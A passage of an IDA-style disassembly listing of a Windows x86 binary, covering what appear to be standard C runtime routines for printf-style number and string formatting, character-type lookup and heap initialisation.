loc_41A756: ; CODE XREF: sub_41A5BA+186�j
; sub_41A5BA+18C�j
mov [ebp+var_30], edx
loc_41A759: ; CODE XREF: sub_41A5BA+6E�j
; DATA XREF: .text:off_41ACDB�o
mov ecx, dword_43DD30 ; jumptable 0041A628 case 0
mov [ebp+var_24], edx
movzx eax, bl
test byte ptr [ecx+eax*2+1], 80h
jz short loc_41A785
lea eax, [ebp+var_14]
push eax ; int
push [ebp+arg_0] ; int
movsx eax, bl
push eax ; Buffer
call sub_41ACFB
mov bl, [edi]
add esp, 0Ch
inc edi
mov [ebp+arg_4], edi
loc_41A785: ; CODE XREF: sub_41A5BA+1B0�j
lea eax, [ebp+var_14]
push eax ; int
push [ebp+arg_0] ; int
movsx eax, bl
push eax ; Buffer
call sub_41ACFB
add esp, 0Ch
jmp loc_41ACC2 ; default
; ---------------------------------------------------------------------------
loc_41A79D: ; CODE XREF: sub_41A5BA+6E�j
; DATA XREF: .text:off_41ACDB�o
movsx eax, bl ; jumptable 0041A628 case 7
cmp eax, 67h
jg loc_41A9C5
cmp eax, 65h
jge loc_41A848
cmp eax, 58h
jg loc_41A8A6
jz loc_41AA39
sub eax, 43h
jz loc_41A869
dec eax
dec eax
jz short loc_41A83E
dec eax
dec eax
jz short loc_41A83E
sub eax, 0Ch
jnz loc_41ABC4
test word ptr [ebp+var_4], 830h
jnz short loc_41A7E7
or byte ptr [ebp+var_4+1], 8
loc_41A7E7: ; CODE XREF: sub_41A5BA+227�j
; sub_41A5BA+42A�j
mov esi, [ebp+var_10]
cmp esi, 0FFFFFFFFh
jnz short loc_41A7F4
mov esi, 7FFFFFFFh
loc_41A7F4: ; CODE XREF: sub_41A5BA+233�j
lea eax, [ebp+arg_8]
push eax
call sub_41AD99
test word ptr [ebp+var_4], 810h
pop ecx
mov ecx, eax
mov [ebp+var_8], ecx
jz loc_41AA0D
test ecx, ecx
jnz short loc_41A81C
mov ecx, dword ptr unk_43DD2C
mov [ebp+var_8], ecx
loc_41A81C: ; CODE XREF: sub_41A5BA+257�j
mov [ebp+var_24], 1
mov eax, ecx
loc_41A825: ; CODE XREF: sub_41A5BA+282�j
mov edx, esi
dec esi
test edx, edx
jz loc_41AA04
cmp word ptr [eax], 0
jz loc_41AA04
inc eax
inc eax
jmp short loc_41A825
; ---------------------------------------------------------------------------
loc_41A83E: ; CODE XREF: sub_41A5BA+212�j
; sub_41A5BA+216�j
mov [ebp+var_34], 1
add bl, 20h
loc_41A848: ; CODE XREF: sub_41A5BA+1F2�j
or [ebp+var_4], 40h
lea edi, [ebp+UsedDefaultChar]
cmp ecx, edx
mov [ebp+var_8], edi
jge loc_41A92C
mov [ebp+var_10], 6
jmp loc_41A93A
; ---------------------------------------------------------------------------
loc_41A869: ; CODE XREF: sub_41A5BA+20A�j
test word ptr [ebp+var_4], 830h
jnz short loc_41A875
or byte ptr [ebp+var_4+1], 8
loc_41A875: ; CODE XREF: sub_41A5BA+2B5�j
; sub_41A5BA+2F4�j
test word ptr [ebp+var_4], 810h
lea eax, [ebp+arg_8]
push eax
jz short loc_41A8BC
call sub_41ADB6
push eax ; WideCharStr
lea eax, [ebp+UsedDefaultChar]
push eax ; UsedDefaultChar
call sub_42011F
add esp, 0Ch
mov [ebp+var_C], eax
test eax, eax
jge short loc_41A8CF
mov [ebp+var_28], 1
jmp short loc_41A8CF
; ---------------------------------------------------------------------------
loc_41A8A6: ; CODE XREF: sub_41A5BA+1FB�j
sub eax, 5Ah
jz short loc_41A8DD
sub eax, 9
jz short loc_41A875
dec eax
jz loc_41AA9F
jmp loc_41ABC4
; ---------------------------------------------------------------------------
loc_41A8BC: ; CODE XREF: sub_41A5BA+2C5�j
call sub_41AD99
pop ecx
mov [ebp+UsedDefaultChar], al
mov [ebp+var_C], 1
loc_41A8CF: ; CODE XREF: sub_41A5BA+2E1�j
; sub_41A5BA+2EA�j
lea eax, [ebp+UsedDefaultChar]
mov [ebp+var_8], eax
jmp loc_41ABC4
; ---------------------------------------------------------------------------
loc_41A8DD: ; CODE XREF: sub_41A5BA+2EF�j
lea eax, [ebp+arg_8]
push eax
call sub_41AD99
test eax, eax
pop ecx
jz short loc_41A91E
mov ecx, [eax+4]
test ecx, ecx
jz short loc_41A91E
test byte ptr [ebp+var_4+1], 8
jz short loc_41A90F
movsx eax, word ptr [eax]
shr eax, 1
mov [ebp+var_8], ecx
mov [ebp+var_C], eax
mov [ebp+var_24], 1
jmp loc_41ABC4
; ---------------------------------------------------------------------------
loc_41A90F: ; CODE XREF: sub_41A5BA+33C�j
and [ebp+var_24], 0
mov [ebp+var_8], ecx
movsx eax, word ptr [eax]
jmp loc_41ABC1
; ---------------------------------------------------------------------------
loc_41A91E: ; CODE XREF: sub_41A5BA+32F�j
; sub_41A5BA+336�j
mov eax, dword ptr unk_43DD28
mov [ebp+var_8], eax
push eax
jmp loc_41A9BA
; ---------------------------------------------------------------------------
loc_41A92C: ; CODE XREF: sub_41A5BA+29D�j
jnz short loc_41A93A
cmp bl, 67h
jnz short loc_41A93A
mov [ebp+var_10], 1
loc_41A93A: ; CODE XREF: sub_41A5BA+2AA�j
; sub_41A5BA:loc_41A92C�j ...
mov eax, [ebp+arg_8]
push [ebp+var_34]
add eax, 8
mov [ebp+arg_8], eax
push [ebp+var_10]
mov ecx, [eax-8]
mov [ebp+var_48], ecx
mov eax, [eax-4]
mov [ebp+var_44], eax
movsx eax, bl
push eax
lea eax, [ebp+UsedDefaultChar]
push eax
lea eax, [ebp+var_48]
push eax
call dword_440090
mov esi, [ebp+var_4]
add esp, 14h
and esi, 80h
jz short loc_41A98C
cmp [ebp+var_10], 0
jnz short loc_41A98C
lea eax, [ebp+UsedDefaultChar]
push eax
call dword_44009C
pop ecx
loc_41A98C: ; CODE XREF: sub_41A5BA+3BC�j
; sub_41A5BA+3C2�j
cmp bl, 67h
jnz short loc_41A9A3
test esi, esi
jnz short loc_41A9A3
lea eax, [ebp+UsedDefaultChar]
push eax
call dword_440094
pop ecx
loc_41A9A3: ; CODE XREF: sub_41A5BA+3D5�j
; sub_41A5BA+3D9�j
cmp [ebp+UsedDefaultChar], 2Dh
jnz short loc_41A9B9
or byte ptr [ebp+var_4+1], 1
lea edi, [ebp+var_247]
mov [ebp+var_8], edi
loc_41A9B9: ; CODE XREF: sub_41A5BA+3F0�j
push edi
loc_41A9BA: ; CODE XREF: sub_41A5BA+36D�j
call sub_4180D0
pop ecx
jmp loc_41ABC1
; ---------------------------------------------------------------------------
loc_41A9C5: ; CODE XREF: sub_41A5BA+1E9�j
sub eax, 69h
jz loc_41AA9F
sub eax, 5
jz loc_41AA75
dec eax
jz loc_41AA62
dec eax
jz short loc_41AA32
sub eax, 3
jz loc_41A7E7
dec eax
dec eax
jz loc_41AAA3
sub eax, 3
jnz loc_41ABC4
mov [ebp+var_2C], 27h
jmp short loc_41AA40
; ---------------------------------------------------------------------------
loc_41AA04: ; CODE XREF: sub_41A5BA+270�j
; sub_41A5BA+27A�j
sub eax, ecx
sar eax, 1
jmp loc_41ABC1
; ---------------------------------------------------------------------------
loc_41AA0D: ; CODE XREF: sub_41A5BA+24F�j
test ecx, ecx
jnz short loc_41AA1A
mov ecx, dword ptr unk_43DD28
mov [ebp+var_8], ecx
loc_41AA1A: ; CODE XREF: sub_41A5BA+455�j
mov eax, ecx
loc_41AA1C: ; CODE XREF: sub_41A5BA+46F�j
mov edx, esi
dec esi
test edx, edx
jz short loc_41AA2B
cmp byte ptr [eax], 0
jz short loc_41AA2B
inc eax
jmp short loc_41AA1C
; ---------------------------------------------------------------------------
loc_41AA2B: ; CODE XREF: sub_41A5BA+467�j
; sub_41A5BA+46C�j
sub eax, ecx
jmp loc_41ABC1
; ---------------------------------------------------------------------------
loc_41AA32: ; CODE XREF: sub_41A5BA+425�j
mov [ebp+var_10], 8
loc_41AA39: ; CODE XREF: sub_41A5BA+201�j
mov [ebp+var_2C], 7
loc_41AA40: ; CODE XREF: sub_41A5BA+448�j
test byte ptr [ebp+var_4], 80h
mov [ebp+var_C], 10h
jz short loc_41AAAA
mov al, byte ptr [ebp+var_2C]
mov [ebp+var_16], 30h
add al, 51h
mov [ebp+var_1C], 2
mov [ebp+var_15], al
jmp short loc_41AAAA
; ---------------------------------------------------------------------------
loc_41AA62: ; CODE XREF: sub_41A5BA+41E�j
test byte ptr [ebp+var_4], 80h
mov [ebp+var_C], 8
jz short loc_41AAAA
or byte ptr [ebp+var_4+1], 2
jmp short loc_41AAAA
; ---------------------------------------------------------------------------
loc_41AA75: ; CODE XREF: sub_41A5BA+417�j
lea eax, [ebp+arg_8]
push eax
call sub_41AD99
test byte ptr [ebp+var_4], 20h
pop ecx
jz short loc_41AA8E
mov cx, word ptr [ebp+var_14]
mov [eax], cx
jmp short loc_41AA93
; ---------------------------------------------------------------------------
loc_41AA8E: ; CODE XREF: sub_41A5BA+4C9�j
mov ecx, [ebp+var_14]
mov [eax], ecx
loc_41AA93: ; CODE XREF: sub_41A5BA+4D2�j
mov [ebp+var_28], 1
jmp loc_41ACC2 ; default
; ---------------------------------------------------------------------------
loc_41AA9F: ; CODE XREF: sub_41A5BA+2F7�j
; sub_41A5BA+40E�j
or [ebp+var_4], 40h
loc_41AAA3: ; CODE XREF: sub_41A5BA+432�j
mov [ebp+var_C], 0Ah
loc_41AAAA: ; CODE XREF: sub_41A5BA+491�j
; sub_41A5BA+4A6�j ...
test byte ptr [ebp+var_4+1], 80h
jz short loc_41AABC
lea eax, [ebp+arg_8]
push eax
call sub_41ADA6
pop ecx
jmp short loc_41AAFD
; ---------------------------------------------------------------------------
loc_41AABC: ; CODE XREF: sub_41A5BA+4F4�j
test byte ptr [ebp+var_4], 20h
jz short loc_41AAE3
test byte ptr [ebp+var_4], 40h
lea eax, [ebp+arg_8]
push eax
jz short loc_41AAD8
call sub_41AD99
pop ecx
movsx eax, ax
loc_41AAD5: ; CODE XREF: sub_41A5BA+527�j
; sub_41A5BA+539�j
cdq
jmp short loc_41AAFD
; ---------------------------------------------------------------------------
loc_41AAD8: ; CODE XREF: sub_41A5BA+510�j
call sub_41AD99
pop ecx
movzx eax, ax
jmp short loc_41AAD5
; ---------------------------------------------------------------------------
loc_41AAE3: ; CODE XREF: sub_41A5BA+506�j
test byte ptr [ebp+var_4], 40h
lea eax, [ebp+arg_8]
push eax
jz short loc_41AAF5
call sub_41AD99
pop ecx
jmp short loc_41AAD5
; ---------------------------------------------------------------------------
loc_41AAF5: ; CODE XREF: sub_41A5BA+531�j
call sub_41AD99
pop ecx
xor edx, edx
loc_41AAFD: ; CODE XREF: sub_41A5BA+500�j
; sub_41A5BA+51C�j
test byte ptr [ebp+var_4], 40h
jz short loc_41AB1E
test edx, edx
jg short loc_41AB1E
jl short loc_41AB0D
test eax, eax
jnb short loc_41AB1E
loc_41AB0D: ; CODE XREF: sub_41A5BA+54D�j
neg eax
adc edx, 0
mov esi, eax
neg edx
or byte ptr [ebp+var_4+1], 1
mov edi, edx
jmp short loc_41AB22
; ---------------------------------------------------------------------------
loc_41AB1E: ; CODE XREF: sub_41A5BA+547�j
; sub_41A5BA+54B�j ...
mov esi, eax
mov edi, edx
loc_41AB22: ; CODE XREF: sub_41A5BA+562�j
test byte ptr [ebp+var_4+1], 80h
jnz short loc_41AB2B
and edi, 0
loc_41AB2B: ; CODE XREF: sub_41A5BA+56C�j
cmp [ebp+var_10], 0
jge short loc_41AB3A
mov [ebp+var_10], 1
jmp short loc_41AB3E
; ---------------------------------------------------------------------------
loc_41AB3A: ; CODE XREF: sub_41A5BA+575�j
and [ebp+var_4], 0FFFFFFF7h
loc_41AB3E: ; CODE XREF: sub_41A5BA+57E�j
mov eax, esi
or eax, edi
jnz short loc_41AB48
and [ebp+var_1C], 0
loc_41AB48: ; CODE XREF: sub_41A5BA+588�j
lea eax, [ebp+var_49]
mov [ebp+var_8], eax
loc_41AB4E: ; CODE XREF: sub_41A5BA+5DD�j
mov eax, [ebp+var_10]
dec [ebp+var_10]
test eax, eax
jg short loc_41AB5E
mov eax, esi
or eax, edi
jz short loc_41AB99
loc_41AB5E: ; CODE XREF: sub_41A5BA+59C�j
mov eax, [ebp+var_C]
cdq
push edx
push eax
push edi
push esi
mov [ebp+var_40], eax
mov [ebp+var_3C], edx
call sub_419A20
push [ebp+var_3C]
mov ebx, eax
add ebx, 30h
push [ebp+var_40]
push edi
push esi
call sub_419AA0
cmp ebx, 39h
mov esi, eax
mov edi, edx
jle short loc_41AB8F
add ebx, [ebp+var_2C]
loc_41AB8F: ; CODE XREF: sub_41A5BA+5D0�j
mov eax, [ebp+var_8]
dec [ebp+var_8]
mov [eax], bl
jmp short loc_41AB4E
; ---------------------------------------------------------------------------
loc_41AB99: ; CODE XREF: sub_41A5BA+5A2�j
lea eax, [ebp+var_49]
sub eax, [ebp+var_8]
inc [ebp+var_8]
test byte ptr [ebp+var_4+1], 2
mov [ebp+var_C], eax
jz short loc_41ABC4
mov ecx, [ebp+var_8]
cmp byte ptr [ecx], 30h
jnz short loc_41ABB7
test eax, eax
jnz short loc_41ABC4
loc_41ABB7: ; CODE XREF: sub_41A5BA+5F7�j
dec [ebp+var_8]
inc eax
mov ecx, [ebp+var_8]
mov byte ptr [ecx], 30h
loc_41ABC1: ; CODE XREF: sub_41A5BA+35F�j
; sub_41A5BA+406�j ...
mov [ebp+var_C], eax
loc_41ABC4: ; CODE XREF: sub_41A5BA+21B�j
; sub_41A5BA+2FD�j ...
cmp [ebp+var_28], 0
jnz loc_41ACC2 ; default
mov ebx, [ebp+var_4]
test bl, 40h
jz short loc_41ABFC
test bh, 1
jz short loc_41ABE1
mov [ebp+var_16], 2Dh
jmp short loc_41ABF5
; ---------------------------------------------------------------------------
loc_41ABE1: ; CODE XREF: sub_41A5BA+61F�j
test bl, 1
jz short loc_41ABEC
mov [ebp+var_16], 2Bh
jmp short loc_41ABF5
; ---------------------------------------------------------------------------
loc_41ABEC: ; CODE XREF: sub_41A5BA+62A�j
test bl, 2
jz short loc_41ABFC
mov [ebp+var_16], 20h
loc_41ABF5: ; CODE XREF: sub_41A5BA+625�j
; sub_41A5BA+630�j
mov [ebp+var_1C], 1
loc_41ABFC: ; CODE XREF: sub_41A5BA+61A�j
; sub_41A5BA+635�j
mov esi, [ebp+var_20]
sub esi, [ebp+var_1C]
sub esi, [ebp+var_C]
test bl, 0Ch
jnz short loc_41AC1C
lea eax, [ebp+var_14]
push eax ; int
push [ebp+arg_0] ; int
push esi ; int
push 20h ; Buffer
call sub_41AD30
add esp, 10h
loc_41AC1C: ; CODE XREF: sub_41A5BA+64E�j
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_16]
push [ebp+arg_0]
push [ebp+var_1C]
push eax
call sub_41AD61
add esp, 10h
test bl, 8
jz short loc_41AC4E
test bl, 4
jnz short loc_41AC4E
lea eax, [ebp+var_14]
push eax ; int
push [ebp+arg_0] ; int
push esi ; int
push 30h ; Buffer
call sub_41AD30
add esp, 10h
loc_41AC4E: ; CODE XREF: sub_41A5BA+67B�j
; sub_41A5BA+680�j
cmp [ebp+var_24], 0
jz short loc_41AC95
cmp [ebp+var_C], 0
jle short loc_41AC95
mov eax, [ebp+var_C]
mov ebx, [ebp+var_8]
lea edi, [eax-1]
loc_41AC63: ; CODE XREF: sub_41A5BA+6D7�j
mov ax, [ebx]
inc ebx
push eax ; WideCharStr
lea eax, [ebp+var_38]
push eax ; UsedDefaultChar
inc ebx
call sub_42011F
pop ecx
test eax, eax
pop ecx
jle short loc_41ACAA
lea ecx, [ebp+var_14]
push ecx
push [ebp+arg_0]
push eax
lea eax, [ebp+var_38]
push eax
call sub_41AD61
add esp, 10h
mov eax, edi
dec edi
test eax, eax
jnz short loc_41AC63
jmp short loc_41ACAA
; ---------------------------------------------------------------------------
loc_41AC95: ; CODE XREF: sub_41A5BA+698�j
; sub_41A5BA+69E�j
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push [ebp+var_C]
push [ebp+var_8]
call sub_41AD61
add esp, 10h
loc_41ACAA: ; CODE XREF: sub_41A5BA+6BC�j
; sub_41A5BA+6D9�j
test byte ptr [ebp+var_4], 4
jz short loc_41ACC2 ; default
lea eax, [ebp+var_14]
push eax ; int
push [ebp+arg_0] ; int
push esi ; int
push 20h ; Buffer
call sub_41AD30
add esp, 10h
loc_41ACC2: ; CODE XREF: sub_41A5BA+68�j
; sub_41A5BA+8B�j ...
mov edi, [ebp+arg_4] ; default
mov bl, [edi]
inc edi
test bl, bl
mov [ebp+arg_4], edi
jnz loc_41A5E6
loc_41ACD3: ; CODE XREF: sub_41A5BA+1F�j
; sub_41A5BA+37�j
mov eax, [ebp+var_14]
pop edi
pop esi
pop ebx
leave
retn
sub_41A5BA endp
; ---------------------------------------------------------------------------
off_41ACDB dd offset loc_41A759 ; DATA XREF: sub_41A5BA+6E�r
dd offset loc_41A62F ; jump table for switch statement
dd offset loc_41A64A
dd offset loc_41A696
dd offset loc_41A6CD
dd offset loc_41A6D5
dd offset loc_41A70A
dd offset loc_41A79D
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41ACFB(int Buffer, int, int)
sub_41ACFB proc near ; CODE XREF: sub_41A5BA+1BD�p
; sub_41A5BA+1D6�p ...
Buffer = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_4]
dec dword ptr [ecx+4]
js short loc_41AD14
mov edx, [ecx]
mov al, byte ptr [ebp+Buffer]
mov [edx], al
inc dword ptr [ecx]
movzx eax, al
jmp short loc_41AD1F
; ---------------------------------------------------------------------------
loc_41AD14: ; CODE XREF: sub_41ACFB+9�j
push ecx ; int
push [ebp+Buffer] ; Buffer
call sub_41A4A5
pop ecx
pop ecx
loc_41AD1F: ; CODE XREF: sub_41ACFB+17�j
cmp eax, 0FFFFFFFFh
mov eax, [ebp+arg_8]
jnz short loc_41AD2C
or dword ptr [eax], 0FFFFFFFFh
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41AD2C: ; CODE XREF: sub_41ACFB+2A�j
inc dword ptr [eax]
pop ebp
retn
sub_41ACFB endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_41AD30(int Buffer, int, int, int)
sub_41AD30 proc near ; CODE XREF: sub_41A5BA+65A�p
; sub_41A5BA+68C�p ...
Buffer = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push esi
push edi
mov edi, [esp+8+arg_4]
mov eax, edi
dec edi
test eax, eax
jle short loc_41AD5E
mov esi, [esp+8+arg_C]
loc_41AD41: ; CODE XREF: sub_41AD30+2C�j
push esi ; int
push [esp+0Ch+arg_8] ; int
push [esp+10h+Buffer] ; Buffer
call sub_41ACFB
add esp, 0Ch
cmp dword ptr [esi], 0FFFFFFFFh
jz short loc_41AD5E
mov eax, edi
dec edi
test eax, eax
jg short loc_41AD41
loc_41AD5E: ; CODE XREF: sub_41AD30+B�j
; sub_41AD30+25�j
pop edi
pop esi
retn
sub_41AD30 endp
; =============== S U B R O U T I N E =======================================
sub_41AD61 proc near ; CODE XREF: sub_41A5BA+670�p
; sub_41A5BA+6CA�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
mov ebx, [esp+4+arg_4]
mov eax, ebx
dec ebx
push esi
push edi
test eax, eax
jle short loc_41AD95
mov edi, [esp+0Ch+arg_C]
mov esi, [esp+0Ch+arg_0]
loc_41AD77: ; CODE XREF: sub_41AD61+32�j
movsx eax, byte ptr [esi]
push edi ; int
inc esi
push [esp+10h+arg_8] ; int
push eax ; Buffer
call sub_41ACFB
add esp, 0Ch
cmp dword ptr [edi], 0FFFFFFFFh
jz short loc_41AD95
mov eax, ebx
dec ebx
test eax, eax
jg short loc_41AD77
loc_41AD95: ; CODE XREF: sub_41AD61+C�j
; sub_41AD61+2B�j
pop edi
pop esi
pop ebx
retn
sub_41AD61 endp
; =============== S U B R O U T I N E =======================================
sub_41AD99 proc near ; CODE XREF: sub_41A5BA+E5�p
; sub_41A5BA+124�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
add dword ptr [eax], 4
mov eax, [eax]
mov eax, [eax-4]
retn
sub_41AD99 endp
; =============== S U B R O U T I N E =======================================
sub_41ADA6 proc near ; CODE XREF: sub_41A5BA+4FA�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
add dword ptr [eax], 8
mov ecx, [eax]
mov eax, [ecx-8]
mov edx, [ecx-4]
retn
sub_41ADA6 endp
; =============== S U B R O U T I N E =======================================
sub_41ADB6 proc near ; CODE XREF: sub_41A5BA+2C7�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
add dword ptr [eax], 4
mov eax, [eax]
mov ax, [eax-4]
retn
sub_41ADB6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41ADC4(WORD CharType, int)
sub_41ADC4 proc near ; CODE XREF: sub_417E44+17�p
; sub_417E44+58�p ...
MultiByteStr = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
CharType = word ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, dword ptr [ebp+CharType]
lea ecx, [eax+1]
cmp ecx, 100h
ja short loc_41ADE2
mov ecx, dword_43DD30
movzx eax, word ptr [ecx+eax*2]
jmp short loc_41AE34
; ---------------------------------------------------------------------------
loc_41ADE2: ; CODE XREF: sub_41ADC4+10�j
mov ecx, eax
push esi
mov esi, dword_43DD30
sar ecx, 8
movzx edx, cl
test byte ptr [esi+edx*2+1], 80h
pop esi
jz short loc_41AE07
and [ebp+var_2], 0
mov [ebp+MultiByteStr], cl
mov [ebp+var_3], al
push 2
jmp short loc_41AE10
; ---------------------------------------------------------------------------
loc_41AE07: ; CODE XREF: sub_41ADC4+33�j
and [ebp+var_3], 0
mov [ebp+MultiByteStr], al
push 1
loc_41AE10: ; CODE XREF: sub_41ADC4+41�j
pop eax
lea ecx, [ebp+0Ah]
push 1 ; int
push 0 ; Locale
push 0 ; CodePage
push ecx ; lpCharType
push eax ; cbMultiByte
lea eax, [ebp+MultiByteStr]
push eax ; lpMultiByteStr
push 1 ; dwInfoType
call sub_420187
add esp, 1Ch
test eax, eax
jnz short loc_41AE30
leave
retn
; ---------------------------------------------------------------------------
loc_41AE30: ; CODE XREF: sub_41ADC4+68�j
movzx eax, word ptr [ebp+0Ah]
loc_41AE34: ; CODE XREF: sub_41ADC4+1C�j
and eax, [ebp+arg_4]
leave
retn
sub_41ADC4 endp
; =============== S U B R O U T I N E =======================================
sub_41AE39 proc near ; CODE XREF: sub_418187+1F�p
; sub_419C9F+126�p ...
arg_0 = dword ptr 4
mov eax, dword ptr byte_445EDC+0D4440h
test eax, eax
jz short loc_41AE51
push [esp+arg_0]
call eax
test eax, eax
pop ecx
jz short loc_41AE51
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_41AE51: ; CODE XREF: sub_41AE39+7�j
; sub_41AE39+12�j
xor eax, eax
retn
sub_41AE39 endp
; =============== S U B R O U T I N E =======================================
sub_41AE54 proc near ; CODE XREF: sub_41AE81+136�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push 0
and dword ptr [esi], 0
call dword ptr byte_4240F8
cmp word ptr [eax], 5A4Dh
jnz short loc_41AE7F
mov ecx, [eax+3Ch]
test ecx, ecx
jz short loc_41AE7F
add eax, ecx
mov cl, [eax+1Ah]
mov [esi], cl
mov al, [eax+1Bh]
mov [esi+1], al
loc_41AE7F: ; CODE XREF: sub_41AE54+15�j
; sub_41AE54+1C�j
pop esi
retn
sub_41AE54 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AE81 proc near ; CODE XREF: sub_41AFC9+20�p
Buffer = byte ptr -122Ch
var_19C = byte ptr -19Ch
VersionInformation= _OSVERSIONINFOA ptr -98h
var_4 = byte ptr -4
push ebp
mov ebp, esp
mov eax, 122Ch
call sub_417F30
lea eax, [ebp+VersionInformation]
push ebx
push eax ; lpVersionInformation
mov [ebp+VersionInformation.dwOSVersionInfoSize], 94h
call GetVersionExA ; GetVersionExA
test eax, eax
jz short loc_41AEC4
cmp [ebp+VersionInformation.dwPlatformId], 2
jnz short loc_41AEC4
cmp [ebp+VersionInformation.dwMajorVersion], 5
jb short loc_41AEC4
push 1
pop eax
jmp loc_41AFC6
; ---------------------------------------------------------------------------
loc_41AEC4: ; CODE XREF: sub_41AE81+27�j
; sub_41AE81+30�j ...
lea eax, [ebp+Buffer]
push 1090h ; nSize
push eax ; lpBuffer
push offset byte_424738 ; lpName
call GetEnvironmentVariableA ; GetEnvironmentVariableA
test eax, eax
jz loc_41AFB3
xor ebx, ebx
lea ecx, [ebp+Buffer]
cmp [ebp+Buffer], bl
jz short loc_41AF06
loc_41AEF3: ; CODE XREF: sub_41AE81+83�j
mov al, [ecx]
cmp al, 61h
jl short loc_41AF01
cmp al, 7Ah
jg short loc_41AF01
sub al, 20h
mov [ecx], al
loc_41AF01: ; CODE XREF: sub_41AE81+76�j
; sub_41AE81+7A�j
inc ecx
cmp [ecx], bl
jnz short loc_41AEF3
loc_41AF06: ; CODE XREF: sub_41AE81+70�j
lea eax, [ebp+Buffer]
push 16h
push eax
push 424720h
call sub_419400
add esp, 0Ch
test eax, eax
jnz short loc_41AF28
lea eax, [ebp+Buffer]
jmp short loc_41AF71
; ---------------------------------------------------------------------------
loc_41AF28: ; CODE XREF: sub_41AE81+9D�j
lea eax, [ebp+var_19C]
push 104h
push eax
push ebx
call dword ptr byte_424084+4
cmp [ebp+var_19C], bl
lea ecx, [ebp+var_19C]
jz short loc_41AF5C
loc_41AF49: ; CODE XREF: sub_41AE81+D9�j
mov al, [ecx]
cmp al, 61h
jl short loc_41AF57
cmp al, 7Ah
jg short loc_41AF57
sub al, 20h
mov [ecx], al
loc_41AF57: ; CODE XREF: sub_41AE81+CC�j
; sub_41AE81+D0�j
inc ecx
cmp [ecx], bl
jnz short loc_41AF49
loc_41AF5C: ; CODE XREF: sub_41AE81+C6�j
lea eax, [ebp+var_19C]
push eax
lea eax, [ebp+Buffer]
push eax
call sub_417F60
pop ecx
pop ecx
loc_41AF71: ; CODE XREF: sub_41AE81+A5�j
cmp eax, ebx
jz short loc_41AFB3
push 2Ch
push eax
call sub_419690
pop ecx
cmp eax, ebx
pop ecx
jz short loc_41AFB3
inc eax
mov ecx, eax
cmp [eax], bl
jz short loc_41AF98
loc_41AF8A: ; CODE XREF: sub_41AE81+115�j
cmp byte ptr [ecx], 3Bh
jnz short loc_41AF93
mov [ecx], bl
jmp short loc_41AF94
; ---------------------------------------------------------------------------
loc_41AF93: ; CODE XREF: sub_41AE81+10C�j
inc ecx
loc_41AF94: ; CODE XREF: sub_41AE81+110�j
cmp [ecx], bl
jnz short loc_41AF8A
loc_41AF98: ; CODE XREF: sub_41AE81+107�j
push 0Ah
push ebx
push eax
call sub_418CA1
add esp, 0Ch
cmp eax, 2
jz short loc_41AFC6
cmp eax, 3
jz short loc_41AFC6
cmp eax, 1
jz short loc_41AFC6
loc_41AFB3: ; CODE XREF: sub_41AE81+5C�j
; sub_41AE81+F2�j ...
lea eax, [ebp+var_4]
push eax
call sub_41AE54
cmp [ebp+var_4], 6
pop ecx
sbb eax, eax
add eax, 3
loc_41AFC6: ; CODE XREF: sub_41AE81+3E�j
; sub_41AE81+126�j ...
pop ebx
leave
retn
sub_41AE81 endp
; =============== S U B R O U T I N E =======================================
sub_41AFC9 proc near ; CODE XREF: .text:0041A3C0�p
arg_0 = dword ptr 4
xor eax, eax
push 0 ; dwMaximumSize
cmp [esp+4+arg_0], eax
push 1000h ; dwInitialSize
setz al
push eax ; flOptions
call HeapCreate ; HeapCreate
test eax, eax
mov dword ptr byte_445EDC+0D5A44h, eax
jz short loc_41B01F
call sub_41AE81
cmp eax, 3
mov dword ptr byte_445EDC+0D5A48h, eax
jnz short loc_41B005
push 3F8h
call sub_41B026
pop ecx
jmp short loc_41B00F
; ---------------------------------------------------------------------------
loc_41B005: ; CODE XREF: sub_41AFC9+2D�j
cmp eax, 2
jnz short loc_41B022
call sub_41BB6D
loc_41B00F: ; CODE XREF: sub_41AFC9+3A�j
test eax, eax
jnz short loc_41B022
push dword ptr byte_445EDC+0D5A44h ; hHeap
call HeapDestroy ; HeapDestroy
loc_41B01F: ; CODE XREF: sub_41AFC9+1E�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41B022: ; CODE XREF: sub_41AFC9+3F�j
; sub_41AFC9+48�j
push 1
pop eax
retn
sub_41AFC9 endp
; =============== S U B R O U T I N E =======================================
sub_41B026 proc near ; CODE XREF: sub_41AFC9+34�p
arg_0 = dword ptr 4
push 140h ; dwBytes
push 0 ; dwFlags
push dword ptr byte_445EDC+0D5A44h ; hHeap
call HeapAlloc
test eax, eax
mov dword ptr byte_445EDC+0D5A3Ch, eax
jnz short loc_41B043
retn
; ---------------------------------------------------------------------------
loc_41B043: ; CODE XREF: sub_41B026+1A�j
mov ecx, [esp+arg_0]
and dword ptr byte_445EDC+0D5A34h, 0
and dword ptr byte_445EDC+0D5A38h, 0
push 1
mov dword ptr byte_445EDC+0D5A30h, eax
mov dword ptr byte_445EDC+0D5A40h, ecx
mov dword ptr byte_445EDC+0D5A28h, 10h
pop eax
retn
sub_41B026 endp
; =============== S U B R O U T I N E =======================================
sub_41B06E proc near ; CODE XREF: sub_418227+17�p
; sub_419C9F+4C�p ...
arg_0 = dword ptr 4
mov eax, dword ptr byte_445EDC+0D5A38h
lea ecx, [eax+eax*4]
mov eax, dword ptr byte_445EDC+0D5A3Ch
